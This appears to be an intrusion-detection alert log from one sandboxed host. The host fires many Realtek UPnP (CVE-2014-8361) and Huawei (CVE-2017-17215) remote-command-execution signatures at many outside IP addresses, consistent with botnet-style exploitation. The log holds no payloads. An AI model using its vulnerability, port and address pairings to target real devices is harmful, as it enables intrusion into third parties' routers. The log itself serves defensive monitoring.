                                      07/20/24-23:02:05.590034TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614140852869192.168.2.23140.127.134.199
                                      07/20/24-23:01:46.212590TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613723652869192.168.2.23103.195.20.112
                                      07/20/24-23:01:41.604763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5834652869192.168.2.23122.124.32.89
                                      07/20/24-23:01:31.979565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501037215192.168.2.2341.115.9.128
                                      07/20/24-23:01:43.841155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4964652869192.168.2.23130.167.196.86
                                      07/20/24-23:01:58.585039TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4686852869192.168.2.2384.161.189.113
                                      07/20/24-23:01:07.082771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4220237215192.168.2.23197.43.231.118
                                      07/20/24-23:01:42.696197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4462852869192.168.2.2324.42.93.65
                                      07/20/24-23:01:44.674251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5344652869192.168.2.2367.74.166.37
                                      07/20/24-23:01:31.333070TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3797452869192.168.2.23152.161.99.53
                                      07/20/24-23:01:11.816521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276037215192.168.2.23197.136.152.193
                                      07/20/24-23:01:02.113054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4261237215192.168.2.23178.236.15.67
                                      07/20/24-23:01:20.150638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6070237215192.168.2.23157.154.200.5
                                      07/20/24-23:01:40.321300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5823437215192.168.2.23203.82.68.43
                                      07/20/24-23:01:44.745095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4927852869192.168.2.23118.32.91.217
                                      07/20/24-23:01:08.578727TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26019452869192.168.2.23169.193.81.146
                                      07/20/24-23:01:59.377547TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24943052869192.168.2.23208.150.189.204
                                      07/20/24-23:01:34.044152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4031037215192.168.2.2354.105.148.229
                                      07/20/24-23:01:34.045749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284637215192.168.2.23117.32.136.151
                                      07/20/24-23:01:45.287821TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25942052869192.168.2.2383.205.44.142
                                      07/20/24-23:01:43.918789TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25708852869192.168.2.23129.76.21.211
                                      07/20/24-23:01:31.312411TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24337652869192.168.2.2389.183.176.41
                                      07/20/24-23:01:34.048825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4103037215192.168.2.23197.144.161.152
                                      07/20/24-23:01:07.026812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4808237215192.168.2.23134.252.78.39
                                      07/20/24-23:01:20.592479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3659652869192.168.2.2332.75.241.221
                                      07/20/24-23:01:45.098864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25147252869192.168.2.23159.130.44.143
                                      07/20/24-23:01:07.114267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855837215192.168.2.23157.73.211.6
                                      07/20/24-23:01:42.608320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4908652869192.168.2.2337.169.126.92
                                      07/20/24-23:01:20.096752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892437215192.168.2.23157.30.155.108
                                      07/20/24-23:01:42.960666TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614342852869192.168.2.2384.203.232.104
                                      07/20/24-23:01:01.198681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5195452869192.168.2.23100.7.167.160
                                      07/20/24-23:01:51.405782TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497252869192.168.2.2313.25.11.108
                                      07/20/24-23:01:56.950526TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613951252869192.168.2.232.74.163.138
                                      07/20/24-23:01:31.328066TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24639052869192.168.2.2393.61.135.109
                                      07/20/24-23:00:57.220983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553037215192.168.2.23157.37.107.134
                                      07/20/24-23:01:43.206220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4640452869192.168.2.23208.81.102.220
                                      07/20/24-23:01:44.052569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3407452869192.168.2.2331.0.108.140
                                      07/20/24-23:01:52.165240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3312052869192.168.2.23115.121.114.198
                                      07/20/24-23:01:03.159715TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614955052869192.168.2.2378.39.181.117
                                      07/20/24-23:01:45.159648TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25363852869192.168.2.23147.169.170.137
                                      07/20/24-23:01:43.993916TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614484452869192.168.2.2347.141.1.52
                                      07/20/24-23:01:44.811941TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615271652869192.168.2.2324.151.6.155
                                      07/20/24-23:01:59.092655TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5328252869192.168.2.2374.245.76.95
                                      07/20/24-23:01:03.199235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4952852869192.168.2.2346.176.142.26
                                      07/20/24-23:01:04.430069TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615936052869192.168.2.23117.76.49.30
                                      07/20/24-23:01:44.837054TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5628252869192.168.2.23155.161.7.211
                                      07/20/24-23:01:00.651026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214637215192.168.2.2351.142.141.117
                                      07/20/24-23:01:48.155981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5244052869192.168.2.23155.185.16.155
                                      07/20/24-23:01:31.312209TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25741452869192.168.2.2376.83.139.165
                                      07/20/24-23:01:42.233741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4855252869192.168.2.2391.23.23.187
                                      07/20/24-23:01:42.090121TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4541452869192.168.2.23183.154.28.107
                                      07/20/24-23:01:55.741840TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615002252869192.168.2.238.205.247.218
                                      07/20/24-23:00:59.157444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4426837215192.168.2.23197.187.1.61
                                      07/20/24-23:01:42.151857TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614223252869192.168.2.23184.50.158.70
                                      07/20/24-23:01:45.967403TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614611052869192.168.2.238.220.8.58
                                      07/20/24-23:01:44.868029TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23932052869192.168.2.2324.28.111.138
                                      07/20/24-23:01:08.652877TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24958452869192.168.2.2393.10.103.253
                                      07/20/24-23:01:32.039718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313637215192.168.2.2341.217.132.133
                                      07/20/24-23:01:42.718842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5731652869192.168.2.23193.184.52.222
                                      07/20/24-23:01:47.047497TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23283452869192.168.2.23112.206.146.120
                                      07/20/24-23:00:59.168569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584037215192.168.2.2372.48.156.196
                                      07/20/24-23:01:27.723651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259437215192.168.2.23157.31.74.199
                                      07/20/24-23:01:44.320661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5392652869192.168.2.2391.202.203.164
                                      07/20/24-23:01:08.679677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5698852869192.168.2.23105.183.167.212
                                      07/20/24-23:01:45.603921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4270452869192.168.2.23201.180.13.92
                                      07/20/24-23:01:53.524925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5921252869192.168.2.23209.44.4.130
                                      07/20/24-23:01:04.987638TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614457452869192.168.2.23216.207.228.137
                                      07/20/24-23:01:11.642449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594637215192.168.2.2341.208.78.115
                                      07/20/24-23:01:21.952783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5526237215192.168.2.23197.13.253.64
                                      07/20/24-23:01:24.126316TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3878652869192.168.2.23184.74.79.160
                                      07/20/24-23:01:12.841280TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24604052869192.168.2.23143.147.165.127
                                      07/20/24-23:01:41.286262TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3493852869192.168.2.23222.131.76.141
                                      07/20/24-23:01:11.820149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6070437215192.168.2.23184.144.178.174
                                      07/20/24-23:01:27.655551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700637215192.168.2.2336.6.60.249
                                      07/20/24-23:01:24.915904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889037215192.168.2.23196.254.2.2
                                      07/20/24-23:01:53.041672TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614112852869192.168.2.23115.138.89.148
                                      07/20/24-23:01:46.143923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4431652869192.168.2.2364.151.112.79
                                      07/20/24-23:01:49.207937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613814052869192.168.2.2391.195.20.9
                                      07/20/24-23:01:27.656128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137237215192.168.2.23197.71.44.74
                                      07/20/24-23:01:11.820979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013237215192.168.2.2385.72.21.57
                                      07/20/24-23:01:40.322860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700237215192.168.2.23197.197.135.105
                                      07/20/24-23:01:02.444710TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615044252869192.168.2.234.194.116.48
                                      07/20/24-23:01:08.609855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4596452869192.168.2.23168.54.72.251
                                      07/20/24-23:01:27.655551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870037215192.168.2.23197.225.101.65
                                      07/20/24-23:01:58.249042TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5318652869192.168.2.2373.13.167.32
                                      07/20/24-23:01:00.640312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835637215192.168.2.2341.156.85.195
                                      07/20/24-23:01:31.313163TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5399652869192.168.2.2323.131.141.174
                                      07/20/24-23:01:47.709674TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23621652869192.168.2.23147.65.114.30
                                      07/20/24-23:01:42.244235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3630652869192.168.2.23111.252.176.80
                                      07/20/24-23:01:45.078337TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614064652869192.168.2.2375.147.225.215
                                      07/20/24-23:01:43.324295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3904252869192.168.2.23145.21.134.81
                                      07/20/24-23:01:00.639011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297837215192.168.2.23206.176.8.137
                                      07/20/24-23:01:43.874055TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3317652869192.168.2.2336.71.23.107
                                      07/20/24-23:01:43.978983TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25971852869192.168.2.2332.189.144.58
                                      07/20/24-23:01:44.663524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4733252869192.168.2.23132.102.241.51
                                      07/20/24-23:01:46.387777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6013852869192.168.2.2357.145.129.242
                                      07/20/24-23:01:58.031141TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614856852869192.168.2.23208.24.236.236
                                      07/20/24-23:02:07.969418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3816452869192.168.2.23133.134.189.40
                                      07/20/24-23:01:09.021221TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614918452869192.168.2.2344.188.193.15
                                      07/20/24-23:00:59.172943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658637215192.168.2.2341.244.190.175
                                      07/20/24-23:01:08.600680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6081652869192.168.2.2337.189.124.248
                                      07/20/24-23:00:57.222163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4417437215192.168.2.23197.38.235.14
                                      07/20/24-23:01:53.372532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5239252869192.168.2.23109.249.3.178
                                      07/20/24-23:02:05.547419TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613967452869192.168.2.2359.51.41.229
                                      07/20/24-23:01:58.093784TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24074652869192.168.2.23151.217.152.189
                                      07/20/24-23:01:43.091220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5642852869192.168.2.23133.252.225.26
                                      07/20/24-23:01:27.658221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495837215192.168.2.23197.127.76.103
                                      07/20/24-23:01:48.317366TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615181652869192.168.2.2334.173.234.248
                                      07/20/24-23:01:34.044223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5090637215192.168.2.23203.177.111.61
                                      07/20/24-23:01:20.140632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4935237215192.168.2.2341.203.231.160
                                      07/20/24-23:01:40.291616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809637215192.168.2.23213.187.250.71
                                      07/20/24-23:01:02.054387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4124037215192.168.2.23198.107.98.141
                                      07/20/24-23:01:46.983381TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614132652869192.168.2.2337.20.218.143
                                      07/20/24-23:01:04.058922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812037215192.168.2.23157.46.25.223
                                      07/20/24-23:01:50.951743TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24282652869192.168.2.23198.167.255.95
                                      07/20/24-23:01:13.589327TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614351652869192.168.2.2351.20.137.216
                                      07/20/24-23:01:31.983105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4518637215192.168.2.2341.118.52.116
                                      07/20/24-23:00:57.222139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5002837215192.168.2.2327.41.96.136
                                      07/20/24-23:01:02.076414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071437215192.168.2.23197.150.190.33
                                      07/20/24-23:01:08.606848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3926052869192.168.2.2377.76.243.3
                                      07/20/24-23:01:31.974580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4867437215192.168.2.23167.62.210.191
                                      07/20/24-23:01:32.027082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177237215192.168.2.23212.103.196.38
                                      07/20/24-23:01:14.105395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4294237215192.168.2.2341.69.181.229
                                      07/20/24-23:01:26.023836TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614399252869192.168.2.2336.230.221.168
                                      07/20/24-23:01:31.991336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840037215192.168.2.23197.117.206.14
                                      07/20/24-23:01:42.790680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5481252869192.168.2.23188.20.150.72
                                      07/20/24-23:01:41.349768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5603452869192.168.2.231.167.45.35
                                      07/20/24-23:01:07.054782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690037215192.168.2.2341.0.81.109
                                      07/20/24-23:01:44.389834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5803852869192.168.2.23129.65.153.68
                                      07/20/24-23:00:59.148144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031237215192.168.2.2341.73.125.205
                                      07/20/24-23:01:43.636703TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3780452869192.168.2.2371.221.213.203
                                      07/20/24-23:01:44.728463TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5260252869192.168.2.23204.16.50.125
                                      07/20/24-23:01:41.919931TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3279852869192.168.2.23147.68.197.111
                                      07/20/24-23:01:52.684130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4402252869192.168.2.232.109.1.91
                                      07/20/24-23:01:43.978984TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5654252869192.168.2.23126.192.25.7
                                      07/20/24-23:01:21.915268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092437215192.168.2.23197.95.96.216
                                      07/20/24-23:01:34.043842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162037215192.168.2.23197.168.204.140
                                      07/20/24-23:01:48.181097TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3449052869192.168.2.23137.66.212.197
                                      07/20/24-23:01:04.097857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578237215192.168.2.23157.200.219.60
                                      07/20/24-23:01:08.571946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4682652869192.168.2.2382.63.31.170
                                      07/20/24-23:02:04.208558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5519252869192.168.2.23113.102.84.222
                                      07/20/24-23:01:41.360712TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613741052869192.168.2.2347.35.34.220
                                      07/20/24-23:01:52.609463TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5776252869192.168.2.23173.172.122.41
                                      07/20/24-23:01:44.082683TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614989252869192.168.2.2379.95.218.159
                                      07/20/24-23:01:42.042815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5457052869192.168.2.2349.137.23.5
                                      07/20/24-23:01:00.639012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512037215192.168.2.23197.173.93.85
                                      07/20/24-23:01:31.312614TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4944852869192.168.2.23114.247.247.18
                                      07/20/24-23:01:53.353271TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25945252869192.168.2.23179.153.61.251
                                      07/20/24-23:01:25.509340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5615652869192.168.2.2340.231.162.161
                                      07/20/24-23:01:04.058922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297837215192.168.2.23197.13.249.251
                                      07/20/24-23:01:02.085856TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615656652869192.168.2.23113.34.69.120
                                      07/20/24-23:01:24.929013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067637215192.168.2.23157.51.204.149
                                      07/20/24-23:01:25.526897TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614886852869192.168.2.23116.88.149.60
                                      07/20/24-23:01:43.085956TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5742252869192.168.2.23104.39.87.115
                                      07/20/24-23:01:04.098909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3651037215192.168.2.23157.104.12.239
                                      07/20/24-23:01:44.446628TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5868252869192.168.2.2332.189.144.58
                                      07/20/24-23:01:42.637859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3973652869192.168.2.2358.25.190.68
                                      07/20/24-23:01:42.709583TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24860652869192.168.2.23155.110.172.241
                                      07/20/24-23:01:11.632393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177237215192.168.2.23204.214.250.6
                                      07/20/24-23:01:47.749865TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613348452869192.168.2.2381.110.138.235
                                      07/20/24-23:02:05.636717TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613417452869192.168.2.2399.148.114.78
                                      07/20/24-23:01:20.144672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6070437215192.168.2.23157.149.181.67
                                      07/20/24-23:01:44.971718TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615257452869192.168.2.23210.173.156.193
                                      07/20/24-23:02:10.031806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614307652869192.168.2.2364.169.37.205
                                      07/20/24-23:01:02.259207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5549852869192.168.2.23191.173.38.241
                                      07/20/24-23:01:41.637960TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25536052869192.168.2.2380.104.187.148
                                      07/20/24-23:01:42.145997TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5876252869192.168.2.23104.27.90.68
                                      07/20/24-23:02:00.413915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3833452869192.168.2.2348.17.76.254
                                      07/20/24-23:01:42.159489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5224052869192.168.2.2343.168.154.99
                                      07/20/24-23:01:26.010869TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615514252869192.168.2.23221.42.114.149
                                      07/20/24-23:02:02.632381TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24320852869192.168.2.2388.40.199.176
                                      07/20/24-23:00:57.222128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3876437215192.168.2.2360.176.144.80
                                      07/20/24-23:01:48.701127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5211252869192.168.2.23174.95.107.188
                                      07/20/24-23:01:20.131339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374237215192.168.2.2341.45.176.207
                                      07/20/24-23:01:08.607816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4873652869192.168.2.2364.86.139.164
                                      07/20/24-23:01:04.118165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3938437215192.168.2.23197.59.190.80
                                      07/20/24-23:01:44.139692TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5825052869192.168.2.23157.142.102.71
